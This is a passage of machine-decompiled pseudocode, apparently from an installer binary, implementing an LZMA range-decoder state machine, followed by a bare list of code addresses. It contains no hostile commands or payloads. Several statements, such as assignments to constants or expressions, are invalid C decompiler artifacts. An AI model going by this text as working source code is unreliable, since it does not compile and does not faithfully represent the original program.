												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                0x00000000
                0x00406591
                0x00406591
                0x00406595
                0x004065a2
                0x004065ac
                0x00000000
                0x00406597
                0x00406597
                0x004065d2
                0x004065d5
                0x004065d8
                0x004065db
                0x004065db
                0x004065de
                0x004065e5
                0x004065ea
                0x004064cb
                0x004064ce
                0x00406840
                0x00406840
                0x00406840
                0x00406843
                0x00406843
                0x00406843
                0x00406849
                0x0040684f
                0x00406855
                0x0040686f
                0x00406872
                0x00406878
                0x00406883
                0x00406885
                0x00406857
                0x00406857
                0x00406866
                0x0040686a
                0x0040686a
                0x0040688f
                0x00000000
                0x00000000
                0x00406891
